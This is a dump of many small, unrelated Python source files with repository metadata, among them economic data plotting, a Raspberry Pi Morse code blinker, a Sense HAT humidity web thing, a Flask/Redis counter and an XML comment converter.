2971c2d688f374cbce35fdd93a9da5acb61919cb | 148082a4062cfa40e72a7ff435b0b6c6adaf7241 | /economic_analysis/economic_analysis/search_and_visualization.py | 6de8e6a1c85b605aba37fb0c936230df849e09bc | [
"MIT"
] | permissive | Nazar4ick/Homework-research | ccf3cba45718de7e4c100284c4b5a75b691b3411 | 6fce361ab2ed2fab5e367eab47d4b4a3b435d5d1 | refs/heads/master | 2022-07-24T01:06:53.733976 | 2020-05-18T05:23:13 | 2020-05-18T05:23:13 | 250,268,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,947 | py | import countries_data
import matplotlib.pyplot as plt
from custom_array import Array
def get_countries():
    """Load the data objects for every researched country.

    Returns a tuple ordered: Ukraine, Bulgaria, Hungary, Poland, Romania,
    Czech Republic, Slovakia, Slovenia, Croatia, Lithuania, Latvia, Estonia.
    """
    loaders = (
        countries_data.get_ukraine,
        countries_data.get_bulgaria,
        countries_data.get_hungary,
        countries_data.get_poland,
        countries_data.get_romania,
        countries_data.get_czech,
        countries_data.get_slovakia,
        countries_data.get_slovenia,
        countries_data.get_croatia,
        countries_data.get_lithuania,
        countries_data.get_latvia,
        countries_data.get_estonia,
    )
    return tuple(loader() for loader in loaders)
def launch_search_system(countries, country_names):
"""
launches the search system
:param countries: list
:param country_names: list
:return: None
"""
choice = 'yes'
while choice != 'no':
print(country_names)
name = input("What country you would like to investigate? ")
while name not in country_names:
name = input("What country you would like to investigate? ")
# find the desired country
for country in countries:
if country.name == name:
searched = country
# Move on to the info
max_year = 2018
commands = ('gdp', 'investment_inflows', 'investment_outflows',
'manufacturing')
print(commands)
command = input('What would you like to learn? ').lower()
while command not in commands:
command = input('What would you like to learn? ').lower()
# find the desired command
if command == 'gdp':
info = searched.gdp
elif command == 'investment_inflows':
info = searched.investment_inflows
elif command == 'investment_outflows':
info = searched.investment_outflows
# there is no data for outflows further than 2013
max_year = 2013
else:
info = searched.manufacturing
# Move on to the year
min_year = searched.min_indexes[command]
print(f'the minimal year is {min_year}, maximum: {max_year}')
year = 1
while not min_year <= year <= max_year:
year = input("What year's info are you looking for? ")
while True:
try:
year = int(year)
break
except ValueError:
year = input("What year's info are you looking for? ")
# display the info
if command == 'manufacturing' and min_year < 1995:
# fix an error with index error
year -= 2
print(info[year - min_year])
# give an opportunity to learn something more
choice = input('Would you like to learn something more? (yes/no) ')
while choice not in ('yes', 'no'):
choice = input('Would you like to learn something more? (yes/no) ')
def get_requested_countries(countries, country_names):
"""
gets requested countries for visualization and info
:param countries: list of all available countries for research
:param country_names: list
:return: (list, str)
"""
print(country_names)
# gather the requested information
chosen_names = []
requested_countries = []
name = ''
while name != 'next':
name = input('What countries would you like to investigate?'
' ("all" to add all, type "next" to proceed) ')
while name not in country_names and name != 'next' and name != 'all':
name = input('What countries would you like to investigate?'
' ("all" to add all, type "next" to proceed) ')
chosen_names.append(name)
# add chosen countries
for name in chosen_names:
for country in countries:
if name == country.name:
requested_countries.append(country)
elif name == 'all':
requested_countries = countries
break
# ask what info would the user like to learn
commands = ('gdp', 'investment_inflows', 'investment_outflows',
'manufacturing')
print(commands)
info = input('What would you like to visualize? ')
while info not in commands:
info = input('What would you like to visualize? ')
return requested_countries, info
def visualize(countries, country_names):
"""
visualizes requested information
:param countries: list of all available countries for research
:param country_names: list
:return: None
"""
countries_and_info = get_requested_countries(countries, country_names)
countries, info = countries_and_info[0], countries_and_info[1]
year_info = get_max_base_year(countries, info)
base_year = year_info[0]
all_years = year_info[1]
if info == 'gdp':
for country in countries:
slice_from = base_year - country.min_indexes[info]
plt.plot(all_years, country.gdp[slice_from:],
label=country.name)
elif info == 'investment_inflows':
for country in countries:
slice_from = base_year - country.min_indexes[info]
plt.plot(all_years, country.investment_inflows[slice_from:],
label=country.name)
elif info == 'investment_outflows':
for country in countries:
slice_from = base_year - country.min_indexes[info]
# not all countries have info for 2014th year
plt.plot(all_years,
country.investment_outflows[slice_from:2014 - base_year],
label=country.name)
elif info == 'manufacturing':
for country in countries:
slice_from = base_year - country.min_indexes[info]
# some countries have different start years, but have
# the same amount of data, which causes an Error
# Lithuania is an exception
if slice_from >= 4 and country.name not in ('Lithuania', 'Latvia'):
slice_from = 4
elif len(all_years) != len(country.manufacturing[slice_from:]):
all_years = all_years[len(all_years) -
len(country.manufacturing[slice_from:]):]
plt.plot(all_years, country.manufacturing[slice_from:],
label=country.name)
plt.legend()
plt.show()
def get_max_base_year(countries, info):
    """
    gets the max base year, so that the graphics don't shift
    and start from the same point
    :param countries: lst of country objects exposing min_indexes[info]
    :param info: str - one of the indicator names ('gdp', ...)
    :return: (int, Array) - the common base year and the Array of x-axis years
    """
    base_years = []
    # Data for investment outflows only exists up to 2013.
    max_year = 2018
    if info == 'investment_outflows':
        max_year = 2013
    # The latest first-year among all countries becomes the shared base year.
    for country in countries:
        base_years.append(country.min_indexes[info])
    base_year = max(base_years)
    # create an array, so there is no conflict when plotting
    all_years = Array(max_year + 1 - base_year)
    # get all years for the x axis
    for i in range(len(all_years)):
        all_years[i] = base_year + i
    return base_year, all_years
def main():
"""
Controls the search and visualization systems
:return: None
"""
intro = 'This program is designed to help you analyse ' \
'economics of Ukraine or any other\ncountry in ' \
'comparison to other countries with a similar model of economics'
warning = 'When visualizing, type all countries you would like ' \
'to visualize one by one and type "next"'
note = 'GDP is GDP per capita. Investment and manufacturing ' \
'count as percent of GDP'
print(intro)
print('WARNING')
print(warning)
print('NOTE')
print(note)
# get information about all countries in advance
countries = get_countries()
country_names = []
for country in countries:
country_names.append(country.name)
# get the user's choice
choice = ''
while choice != 'q':
choice = input('Would you like to search or visualize?'
' (s or v, q to quit) ')
while choice not in ('s', 'v') and choice != 'q':
choice = input('Would you like to search or visualize?'
' (s or v, q to quit) ')
# proceed to the choice
if choice == 's':
launch_search_system(countries, country_names)
elif choice == 'v':
visualize(countries, country_names)
main()
| [
"noreply@github.com"
] | noreply@github.com |
185916b8c6ed4dfc3a2880a20b9cdaf3fd075629 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/8/sV-.py | dbd279c3dd10a5a0e31f79253387b280f6d56b03 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
    # Print the tokens enclosed in double quotes, joined by single spaces.
    # NOTE(review): lineRemaining is a list of whitespace-split tokens, so
    # this only matches when the opening and closing quotes are standalone
    # tokens; the slice then drops those two quote tokens -- confirm the
    # input format guarantees this.  (Python 2 print statements.)
    if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
        if len(lineRemaining) > 2:
            #data to print
            lineRemaining = lineRemaining[1:-1]
            print ' '.join(lineRemaining)
        else:
            # Empty quoted string: print a blank line.
            print
def main(fileName):
    # Interpret each line of the file: lines whose first token is the
    # keyword 'sV-' are passed (minus the keyword) to printFunction;
    # any other line prints ERROR and stops processing.  (Python 2.)
    with open(fileName) as f:
        for line in f:
            data = line.split()
            if data[0] == 'sV-':
                printFunction(data[1:])
            else:
                print 'ERROR'
                return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
a818f026d27f1f4910ccaef03767ee79b55b13be | b4afd14e3b4e9cff0a99906a69587e348b243aeb | /website/《简明教程》/数据结构/ds_reference.py | ad8d28d89f29f5b7de173ab94ebdd97be12402cf | [] | no_license | zhankq/pythonlearn | d694df23826cda6ba662e852e531e96a10ab2092 | cb714fbb8257193029f958e73e0f9bd6a68d77f1 | refs/heads/master | 2021-12-16T13:51:23.381206 | 2021-12-03T01:13:36 | 2021-12-03T01:13:36 | 205,632,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | print('Simple Assignment')
shoplist = ['apple', 'mango', 'carrot', 'banana']
# mylist is just another name pointing at the same list object
mylist = shoplist
# I bought the first item, so remove it from the list
del shoplist[0]
print('shoplist is', shoplist)
print('mylist is', mylist)
print('Copy by making a full slice')
# Make a copy of the list by taking a full slice
mylist = shoplist[:]
# Delete the first item (of the copy only)
del mylist[0]
print('shoplist is', shoplist)
print('mylist is', mylist)
# Notice that the two lists are now different
| [
"zhankq@163.com"
] | zhankq@163.com |
a754b722541480ba073c1e0b7bb44a477bd042d7 | d74bb5500cf01c740c21b6764604d5355c6b2116 | /calculator.py | f4ae76f1064ed58f661b25159d16017790a9b9ef | [] | no_license | aarmlovich/assignments | 5d1a875703790662aa7852cb18375ea101f666d1 | 0141cedb7986dec8f2834893414d86be512ab483 | refs/heads/master | 2021-10-11T04:21:21.708724 | 2019-01-21T23:38:27 | 2019-01-21T23:38:27 | 164,486,400 | 0 | 0 | null | 2019-01-09T02:10:32 | 2019-01-07T20:01:04 | Python | UTF-8 | Python | false | false | 260 | py | def multiply(a,b):
return a * b
def add(a,b):
    """Return the sum of a and b."""
    total = a + b
    return total
def subtract(a,b):
    """Return a minus b."""
    difference = a - b
    return difference
def divide(a,b):
    """Return a divided by b (true division; raises ZeroDivisionError when b == 0)."""
    quotient = a / b
    return quotient
def square(a,b):
    """Return b squared.

    Bug fix: the original used ``b ^ 2`` -- bitwise XOR, not
    exponentiation -- so e.g. square(_, 6) returned 4 instead of 36.
    Parameter *a* is unused but kept for signature compatibility.
    """
    return (b ** 2)
# Use the calculator functions to square (5 + 6).
# Bug fix: the original print had an unterminated string literal (a
# SyntaxError), and x was computed as 6 ^ 2 (bitwise XOR == 4) instead of
# using the functions defined above.
print("I'm going to use the calculator functions to square (5+6)")
x = square(0, add(5, 6))
print(x)
"aarmlovi@gmail.com"
] | aarmlovi@gmail.com |
cda2926915916edda8332981140a91b32000fea7 | e5e56b7309abd035ef9e33354392cbf8afbd8162 | /humidity-webthing.py | b0e2a6ce59d8df18eb0b48a266c6b4efdc62cc87 | [
"Apache-2.0"
] | permissive | ricklon/sensehat-webthing | 8b703c29d22693933f5d7bd9f8b27b3d1c20adf5 | f2f4982538cfbcae325b7b7603d95bc2ece56182 | refs/heads/master | 2020-04-07T06:29:17.978882 | 2018-12-02T21:17:48 | 2018-12-02T21:17:48 | 158,137,491 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,723 | py |
# Examples based on : https://www.raspberrypi.org/magpi/sense-hat-science-humidity/
import logging
from sense_hat import SenseHat
from datetime import datetime
from time import sleep
# Webthing imports
from asyncio import sleep, CancelledError, get_event_loop
from webthing import (Action, Event, MultipleThings, Property, Thing, Value,
WebThingServer)
import random
import uuid
# Set up log file
logfile = "humidity-"+str(datetime.now().strftime("%Y%m%d-%H%M"))+".csv"
# Configure log settings and format for CSV
logging.basicConfig(filename=logfile, level=logging.DEBUG,
format='%(asctime)s %(message)s',
datefmt='%Y-%m-%d, %H:%M:%S,')
# Configure sense hat
sh = SenseHat()
prev_h = 0
class HumiditySensor(Thing):
""" Humidity Sensor using the SenseHat """
def __init__(self):
Thing.__init__(self,
'Sensehat Humidity Sensor',
['MultiLevelSensor'],
'A web connected humidity sensor')
self.level = Value(0.0)
self.add_property(
Property(self,
'level',
self.level,
metadata={
'@type': 'LevelProperty',
'label': 'HUmidity',
'type': 'float',
'description': 'The current humidity in %',
'minimum': 0,
'maximum': 100,
'unit': 'percent',
'readonly': True,
}))
logging.debug('Starting the sensor update loop')
self.sensor_update_task = get_event_loop().create_task(self.update_level())
async def update_level(self):
try:
while True:
await sleep(3)
new_level = sh.get_humidity()
logging.info(str(new_level))
self.level.notify_of_external_update(new_level)
except CancelledError:
# No clean up needed
pass
def cancel_update_level_task(self):
self.sensor_update_task.cancel()
get_event_loop().run_until_complete(self.sensor_update_task)
def run_server():
SensorHumidity = HumiditySensor()
server = WebThingServer(MultipleThings([SensorHumidity],'Humidity Device'),port=9999)
try:
logging.info('starting the sever')
server.start()
except KeyboardInterrupt:
logging.debug('canceling sesor update looping task')
SensorHumidity.cancel_update_level_task()
logging.info('stopping the server')
server.stop()
logging.info('done')
if __name__=='__main__':
run_server()
| [
"ricklon@fubarlabs.org"
] | ricklon@fubarlabs.org |
3e608ec9b1ecd2351434412bbe5356d49a6d3136 | 3f3dc90fd47b5ce490b42b6fd9f73663fcd70075 | /311Complaints.py | 23bd83b0bd5417276feaedbcabff307328544c30 | [] | no_license | catherine8224/Favorite-Neighborhood | 20cf2108007af30216a847d6016555a71430016e | c842c0a59c9a708dd7dede7decd0dc4ba1d8b9cb | refs/heads/master | 2020-04-14T03:56:21.985856 | 2019-01-07T07:15:35 | 2019-01-07T07:15:35 | 163,620,942 | 0 | 0 | null | 2019-01-07T07:15:36 | 2018-12-30T22:09:47 | null | UTF-8 | Python | false | false | 627 | py | import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("311_Service_Requests_from_2010_to_Present.csv")
##Count = df.groupby(['Complaint Type']).size().reset_index(name='counts')
##poop = Count.sort_values('counts', ascending=False)
##print(poop.head(10))
##df = df.groupby(['Complaint Type']).size().rename(columns={'Complaint Type': 'count'})
###df = df.sort_values('count', ascending=False)
##print(df)
top311 = df['Complaint Type'].value_counts()[:10]
print("The 10 most pressing complaints to the 311 in my neighborhood last year:")
print(top311)
agency = df['Agency Name'].value_counts()
print(agency)
| [
"noreply@github.com"
] | noreply@github.com |
5bbd81b6220271c40f2bc0df4af86e81a6f67d38 | a8fa49c3a6c6d6a66a89089fdd013343f48b436e | /count.py | c58715b8be547e0c27acc75056cc92fa42edd5b9 | [] | no_license | avi527/Tuple | 007ec5b6e832c8fd94a418e7e28001d1d3347553 | 1fa58417a5a86bc541ae62bdcdacddc7f6592e1f | refs/heads/master | 2020-07-08T09:17:53.483953 | 2019-08-21T17:18:53 | 2019-08-21T17:18:53 | 203,630,240 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | # NOTE :- the count() method is used to return the number of elements with
#a specific value in a tuple
#programm to count the number of times letter 'x' appears in specified string
tub='asasasnbcsdjbhjhfaaaaaaabjsdbfdhvfdjhb'
print(tub.count('a'))
| [
"noreply@github.com"
] | noreply@github.com |
13b256f12a36c944c31f5fb6828c2695c5e48be0 | 3e7bd09504377e6c0b1079b5906173141d72169e | /morseCodeSend.py | 26b35672c980070cc52428676a252c038b9bf379 | [] | no_license | anniekroo/MorseCode | 7967eba8622a918b6813811557b0979a432d06a7 | b654387a0dbd35026dbf205d7b545ffa29dc7d80 | refs/heads/master | 2021-04-30T05:08:54.917134 | 2018-02-13T17:31:29 | 2018-02-13T17:31:29 | 121,409,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,984 | py | # Sending morse code signals through LED connected to the Raspi
# timing - start off with a variable time, change length of time for bit
# spacing -
# set it high for two bits and low for two bits (each ltter is 1 bit)
# one bit between letters and two bits between words
import time;
import RPi.GPIO as GPIO
t = 0.5; # seconds, time between symbols is 1 bit time, between letter is 3 bit time, figure out how long it takes
max_length = 20;
msg = "PRAVA SOS"
MORSECODE = {"A": ".-", "B": "-...", "C": "-.-.",
"D": "-..", "E": ".", "F": "..-.",
"G": "--.", "H": "....", "I": "..",
"J": ".---", "K": "-.-", "L": ".-..",
"M": "--", "N": "-.", "O": "---",
"P": ".--.", "Q": "--.-", "R": ".-.",
"S": "...", "T": "-", "U": "..-",
"V": "...-", "W": ".--", "X": "-..-",
"Y": "-.--", "Z": "--..",
}
class Safeguards:
    """Context manager ensuring GPIO.cleanup() runs even if the body raises."""

    def __enter__(self):
        return self

    def __exit__(self, *rabc):
        # rabc is (exc_type, exc_value, traceback); always release the pins.
        GPIO.cleanup()
        print("Safe exit succeeded")
        # True (suppress) only when no exception occurred, so any real
        # exception still propagates after cleanup.
        return not any(rabc)
def prepare_pin(pin = 17):
    """Configure *pin* (BCM numbering) as a digital output."""
    GPIO.setmode(GPIO.BCM)
    GPIO.setup(pin, GPIO.OUT)

def turn_high(pin):
    """Drive *pin* high (LED on)."""
    GPIO.output(pin, GPIO.HIGH)

def turn_low(pin):
    """Drive *pin* low (LED off)."""
    GPIO.output(pin, GPIO.LOW)
def encode_morse(word):
    """Translate *word* into a Morse string.

    Letters are mapped via MORSECODE (case-insensitive); spaces are kept
    as word separators.
    """
    morseword = ""
    for char in word:
        if char == " ":
            morseword = morseword + " "
        else:
            morseword = morseword + MORSECODE[char.upper()]
    # Bug fix: the encoded string was built but never returned, so callers
    # (e.g. blink()) received None and crashed when iterating the message.
    return morseword
def delay(duration):
    """Sleep for *duration* seconds."""
    time.sleep(duration)
def blink(pin = 17, duration = 1):
    """Blink a sync preamble, then flash the Morse-encoded message on *pin*.

    :param pin: BCM GPIO pin driving the LED
    :param duration: one "bit" time in seconds (a dot is half a bit)
    """
    prepare_pin(pin)
    # Preamble: two on periods followed by two off periods.
    for i in range(2):
        turn_high(pin)
        delay(duration)
    for i in range(2):
        turn_low(pin)
        delay(duration)
    # The message never changes between repetitions, so encode it once
    # (relies on encode_morse returning the encoded string).
    encodedmsg = encode_morse(msg)
    for i in range(max_length):
        for char in encodedmsg:
            if char == " ":
                # Word gap: two bit-times low.
                for j in range(2):
                    turn_low(pin)
                    delay(duration)
            if char == ".":
                turn_high(pin)
                delay(0.5*duration)
            if char == "-":
                # Bug fix: the original called turn_high(duration), passing the
                # delay value where the GPIO pin number was expected.
                turn_high(pin)
                delay(duration)
            # Inter-symbol gap so consecutive dots/dashes are distinguishable.
            if char in (".", "-"):
                turn_low(pin)
                delay(0.5*duration)
# Entry point: Safeguards guarantees GPIO.cleanup() runs when blink() exits.
if __name__ == "__main__":
    with Safeguards():
        blink();
| [
"annie.kroo@students.olin.edu"
] | annie.kroo@students.olin.edu |
1eed8b4f1c1aa85ee340a170e3c60fd72bdac31e | bf0c02385a9ef689bf97b258c0535e5a0fe4d279 | /pollsplus/forms.py | 9f014ace86ff4be2a35620dc726d98e4459dbb2d | [] | no_license | cometj03/PollsPlus | df9b9ef5905dd2827ed711133cd7edbb5ace619d | d1e6a17f469cd777b0fc74c22410cd22cad220d5 | refs/heads/master | 2023-02-05T08:18:21.339767 | 2020-12-22T10:44:31 | 2020-12-22T10:44:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | from django import forms
from .models import Post
class PostForm(forms.ModelForm):
    """ModelForm for a Post exposing its title and attachment."""

    class Meta:
        model = Post
        fields = ('title_text', 'file')

    def __init__(self, *args, **kwargs):
        super(PostForm, self).__init__(*args, **kwargs)
        # Override the model-derived default and make the upload mandatory
        # at the form level.
        self.fields['file'].required = True
"tae.gun7784@gmail.com"
] | tae.gun7784@gmail.com |
f7c8f1c12a5b644fe553ebfdbf5c391252a507cd | 1f4852225cec8d9f954190bb36a2a5d586b3e8bd | /ITBooks/con/config.py | 9e37f40a5cefca8a3dae60173977ac91a5116492 | [] | no_license | crono/ITBooks | d8924d54e474b035a2cc54f69cf4f67a5004344a | 61648d3ab71a06f9754ebdc75e37d6d84d100605 | refs/heads/master | 2020-06-05T00:46:34.725762 | 2017-05-22T14:09:45 | 2017-05-22T14:09:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | import os
import sys
# Package root: the ITBooks directory (parent of this "con" package).
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Add ITBooks' parent directory to the import path
sys.path.append(os.path.dirname(BASE_DIR))
# DATABASE locations: <ITBooks>/database/sqlite/books.db
DATABASE_DIR = os.path.join(BASE_DIR, 'database')
SQLITE_FILE = os.path.join(os.path.join(DATABASE_DIR, 'sqlite'), 'books.db')
# Each key equals a spider's name; the value holds that spider's table settings.
SEARCH_CONFIG = {'allitebooks': {'table': ''}, 'blah': {'table': ''}}
| [
"xiaozizayang@gmail.com"
] | xiaozizayang@gmail.com |
c526e5c1ee94d653828fe70c9d5a9315d84ce0bc | 2017c95fef02dd69705056640f08bcd34b0a4ce7 | /01b_no_numbers.py | 217bf6911c76fc645a7cc847739668acf90bb58c | [] | no_license | willoughbys70590/01-recipes | 90e73e411d766002d61021fd701cd820596a0853 | 6d90e6c9ac504655564f6d0b8dcc253b2cb29f12 | refs/heads/master | 2021-01-01T23:35:11.770247 | 2020-04-26T23:17:26 | 2020-04-26T23:17:26 | 239,393,226 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | # Iterates through string...
# Ask the user for a recipe name and reject names containing digits.
recipe_name = input("what is the recipe name? ")
error = "Your recipe name has numbers in it."
# Bug fix: the flag previously started as "yes" (so "you are OK" could never
# print) and the error branch assigned a misspelled variable (has_errors).
has_error = "no"
# Look at each character; if it's a number, complain and stop scanning.
for letter in recipe_name:
    if letter.isdigit():
        print(error)
        has_error = "yes"
        break
# Give user feedback when the name passed the check.
if has_error != "yes":
    print("you are OK")
"60673309+willoughbys70590@users.noreply.github.com"
] | 60673309+willoughbys70590@users.noreply.github.com |
f802fd58fcee700b831bdb8136bc7f82023758d1 | a9b322a0d941825df73a71ad3de605978c9e778d | /virtual/bin/mailmail | 87be1a4b9000543ec5890a1ddb7f1d4876036be7 | [] | no_license | Elianehbmna/chaty-final | 172562d9d7399dc9230cc434d3c29be66a70f094 | 0b459168414da09566ea5b079a922dc1fa8694d0 | refs/heads/master | 2022-12-15T15:03:31.584467 | 2019-12-05T15:29:26 | 2019-12-05T15:29:26 | 223,245,043 | 0 | 0 | null | 2022-12-08T06:55:21 | 2019-11-21T19:07:55 | Python | UTF-8 | Python | false | false | 256 | #!/home/wecode/Documents/chat/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from twisted.mail.scripts.mailmail import run
# Console-script shim: strip setuptools wrapper suffixes ("-script.pyw"/".exe")
# from argv[0] before handing control to twisted's mailmail entry point.
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(run())
| [
"elianehabimana3@gmail.com"
] | elianehabimana3@gmail.com | |
eb8bab4bad28dff6d31089e6d40eec757a60bac4 | d376c005d3b7cc73065a60bf62db0766e5da78ec | /URI_1060.py | c34900effd2e2f89e63d0647c43235da6fc705f6 | [] | no_license | Dairo01001/python_URI | 5355c6a47c90ae94727b16a0848ff6bc24f746b6 | d5f3fbb35e1528a8418859bb2aa3266fe872fe5d | refs/heads/main | 2023-09-04T10:35:35.058988 | 2021-11-05T00:28:30 | 2021-11-05T00:28:30 | 413,130,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | def main():
cont: int = 0
for i in range(6):
aux = input()
cont = cont + 1 if aux[0] != '-' else cont
print(cont, 'valores positivos')
if __name__ == '__main__':
main()
| [
"garcianaranjodairo@gmail.com"
] | garcianaranjodairo@gmail.com |
d2c912ca3b797afbea61156ca9868b86bf8e7456 | 9605946780bd7294a216b9fc740eed1c5cc942eb | /bo-analyser.py | 6207c3854e6b3a59612be2cd153d59c4f7bf986e | [] | no_license | Oleaeuropaea/Static-Analysis-Vulnerability | b910cfdcf574ac3e592925c8c850ef1eb80f6bdc | eef8d9108a6310905e6b2aad958e7ddced50efc6 | refs/heads/master | 2020-07-07T18:00:56.324119 | 2019-08-20T18:44:29 | 2019-08-20T18:44:29 | 203,431,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | #!/usr/bin/python3
import sys
import json
from processor import Processor
class ClassEncoder(json.JSONEncoder):
    """JSON encoder that serializes arbitrary objects via their attribute dict."""

    def default(self, obj):
        # Fall back to the instance's __dict__ for non-JSON-native types.
        return vars(obj)
def main(argv):
    """
    Analyse the JSON-encoded program named on the command line and write the
    result next to it as <program>.output.json.

    :param argv: sys.argv-style list; argv[1] must end in '.json'
    """
    filename = argv[1]
    if not filename.endswith('.json'):
        print('python ./bo-analyser <program>.json')
        print('./bo-analyser <program>.json')
        sys.exit(2)
    # Renamed from 'input' so the builtin input() is not shadowed.
    with open(filename) as source:
        content = source.read()
    code = json.loads(content)
    proc = Processor(code)
    res = proc.run()
    # Bug fix: str.replace() rewrites every '.json' occurrence in the name
    # (e.g. 'a.json.json'); only the validated trailing suffix should change.
    out_name = filename[:-len('.json')] + '.output.json'
    stringRes = json.dumps(res, indent=4, cls=ClassEncoder)
    with open(out_name, 'w') as output:
        output.write(stringRes)
    print('Finished!')

if __name__ == '__main__':
    main(sys.argv)
"noreply@github.com"
] | noreply@github.com |
725ea7b6637e2b0187e91054b6dc387a7ab7141a | 594f60b6a536b831d0df38abea7f0ffc0a2fd3cb | /utils_xml/change_comments.py | 7cf6b3dfb4c62a9e7680dc1f63740306c8c9dee9 | [] | no_license | mh70cz/py | 1478439fe939076cca3a30be2f2d29fb4e8a3cd9 | 7fc23f2133624c787e1dd4856322d48251cc6f0e | refs/heads/master | 2022-08-12T06:08:30.720164 | 2022-08-08T23:16:19 | 2022-08-08T23:16:19 | 95,386,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,157 | py | """ konvertuje obsah elemntů xs:documentation bez xml:lang do komentářů """
from lxml import etree
f_name_in = "TradeRegisterListRequest_orig.xsd"
f_name_out = "TradeRegisterListRequest.xsd"
def main():
    """Move untranslated xs:documentation contents into XML comments.

    Parses f_name_in, and for every xs:annotation: documentation elements
    tagged xml:lang cs/en/sk are kept, while untagged ones are removed and
    their text re-appended to the annotation as an XML comment. The result
    is re-formatted and written to f_name_out.
    """
    tree = etree.parse(f_name_in)
    root = tree.getroot()
    namespaces = {'xs': 'http://www.w3.org/2001/XMLSchema',}
    annotations = root.findall(".//xs:annotation", namespaces)
    # Fully-qualified name of the xml:lang attribute.
    xml_lang = '{http://www.w3.org/XML/1998/namespace}lang'
    for annotation in annotations:
        documentations = annotation.findall("./xs:documentation", namespaces)
        for documentation in documentations:
            att = documentation.attrib
            if att.get(xml_lang, None) in ["cs", "en", "sk"]:
                # Keep language-tagged documentation untouched.
                pass
            elif att.get(xml_lang, None) is None:
                # Untagged documentation: replace the element with a comment
                # holding the same text, appended to the annotation.
                txt = documentation.text
                comment = etree.Comment(txt)
                documentation.getparent().remove(documentation)
                annotation.append(comment)
    rough_bin_string = etree.tostring(root, encoding="utf-8",
                                      xml_declaration=True, pretty_print=True)
    # format_xml fixes up line breaks that lxml does not emit for comments
    # and writes the final file.
    format_xml(rough_bin_string)
def format_xml(xml_bin_string):
    """Finish formatting the serialized schema and write it to f_name_out.

    Appending a Comment element to xs:annotation does not add a newline, so
    this routine splits comment/tag runs onto separate lines and re-indents
    closing </xs:annotation> tags to match their opening tag.

    :param xml_bin_string: UTF-8 encoded bytes produced by etree.tostring
    """
    output = ""
    lenght = 0
    s = xml_bin_string.decode("utf-8")
    # Break "--><" so a comment and the following tag land on separate lines.
    s = s.replace("--><", "-->\n<")
    s = s.split("\n")
    for line in s:
        if "<xs:annotation>" in line:
            # Remember the opening tag's indentation (line length minus tag).
            lenght = len(line) - 15
        elif ("</xs:annotation>" in line) and (len(line) < 19):
            # Re-indent a bare closing tag to the remembered depth.
            line = str(lenght * " ") + line
        output += line + "\n"
    with open(f_name_out, "w", encoding="utf-8") as wf:
        wf.write(output)

main()
| [
"mh70@mh70.cz"
] | mh70@mh70.cz |
b7590d1db13d344f87703875cc4419fd26f5b6d4 | 7b2b076b216cde3dcb4caf1c930b196bd72e1a77 | /app.py | 43d3a97a38a9849494becb30c09b639146b1ab25 | [] | no_license | horisakis/docs_docker_get_started | 33b64de2757d8b2a9b6a7f4422367468551edc70 | 1a53fa921d5e9dd6bcd852aec4a329b78b08eb8f | refs/heads/master | 2020-07-23T06:27:06.355677 | 2019-09-10T09:15:31 | 2019-09-10T09:15:31 | 207,472,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | # -*- coding: utf-8 -*-
from flask import Flask
from redis import Redis, RedisError
import os
import socket
# Connect to Redis (hostname "redis", e.g. a linked container) with short timeouts
redis = Redis(host="redis", db=0, socket_connect_timeout=2, socket_timeout=2)

app = Flask(__name__)

@app.route("/")
def hello():
    """Render a greeting with hostname and a Redis-backed visit counter."""
    try:
        visits = redis.incr("counter")
    except RedisError:
        # Degrade gracefully when Redis is unreachable.
        visits = "<i>cannot connect to Redis, counter disabled</i>"

    html = "<h3>Hello {name}!</h3>" \
           "<b>Hostname:</b> {hostname}<br/>" \
           "<b>Visits:</b> {visits}"
    return html.format(name=os.getenv("NAME", "world"), hostname=socket.gethostname(), visits=visits)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)
| [
"seiji.horisaki@gmail.com"
] | seiji.horisaki@gmail.com |
11bfe4747e741e5997ae8cf7b87271c553026bcd | e7b4150f8b2155a563ec64a6594ebf04f5489344 | /Git/GitHelper.py | 7058fccd78e69650361da58656d42d9f46919b4c | [] | no_license | AlphaSirius/RepositoryMerger | af2aaa74b7c0554abfd9679d8bf881a133a920a7 | 7ca1a3d8c4e52dfd0db37f5a086e5e869f05490f | refs/heads/master | 2020-12-02T08:10:38.092465 | 2017-09-26T07:54:52 | 2017-09-26T07:54:52 | 96,782,356 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,251 | py |
import subprocess
from subprocess import check_output
from Git.Log.LogHelper import info, verbose, verboseList
from Git.Shell.ShellHelper import executeCommandOnShell
masterBranchName = "master"
import os
import time
def checkValidityOfBranch(branchName, repoPath):
    """Log whether *branchName* appears in `git branch -a` output for *repoPath*.

    NOTE(review): the existence flag ``value`` is computed and logged, but the
    function unconditionally returns ``branchName`` -- callers cannot tell
    whether the branch actually exists. Confirm whether ``return value`` was
    intended.
    """
    result = executeCommandOnShell("git branch -a",repoPath, True)
    verbose("git branch -a result in " +repoPath)
    verboseList(result)
    value = branchName in result
